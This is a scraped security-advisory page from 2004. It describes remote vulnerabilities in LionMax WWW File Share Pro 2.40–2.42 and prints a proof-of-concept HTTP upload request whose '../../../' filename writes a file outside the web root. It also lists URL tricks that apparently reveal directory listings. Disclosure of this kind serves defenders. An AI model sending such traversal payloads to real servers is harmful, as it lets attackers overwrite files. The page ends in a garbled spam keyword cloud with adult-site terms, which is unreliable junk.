about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities


Title LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities
Published 2004-01-14-12:00AM
Updated 2004-01-14-10:21PM
Class Unknown
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of these vulnerabilities has been credited to Luigi Auriemma <aluigi@altervista.org>.
Vulnerable  LionMax Software WWW File Share Pro 2.42
LionMax Software WWW File Share Pro 2.41
LionMax Software WWW File Share Pro 2.40
Not Vulnerable  LionMax Software WWW File Share Pro 2.48
LionMax Software WWW File Share Pro 2.46
Code   The following proof of concept exploits were supplied:

POST /upload2.htm HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------00000000000000000000000000000
Content-Length: ignored_by_this_specific_server

-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="file"; filename="../../../badfile.txt"
Content-Type: text/plain

I'm a bad file in a bad location.
If you see me you are vulnerable because an attacker can upload a malicious file everywhere in your system overwriting any existent file.
Now go to download the latest patch for your webserver or disable the Upload function!
-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="Submit"

Upload
-----------------------------00000000000000000000000000000--


http://server/directory./
http://server/directory/
http://server///directory/
"GET directory/ HTTP/1.0" /data/vulnerabilities/exploits/webpostmem.c /data/vulnerabilities/exploits/poststrike.c
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 08:39:35 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
nude rani megarotica SSH bad jojo.c www.9yzz.c sri lanka www.bustyp MS05-051 xxxlsex.co Photo bugi citrix net album bugi www.xxxl.c Wap.Sex.Co www.xxsexx ocean sex. hometheate linux linu shoppingca suse 10.1 Indian sex php-nuke+2 www.zwf2.c news for c search/exp .p[kpokio egpyt song sexy hindi www.inden. www.bubuw. php-nuke+2 Realsoccer shopping c video hits red hat en www.de57.c kerala.sex mvies www.lilywe www.hifase bless www.inden. hz.2smtc.c www.sex ga Sex.ocean. news for c hot sexy n e-xoopport hot sexy n IPBoard 2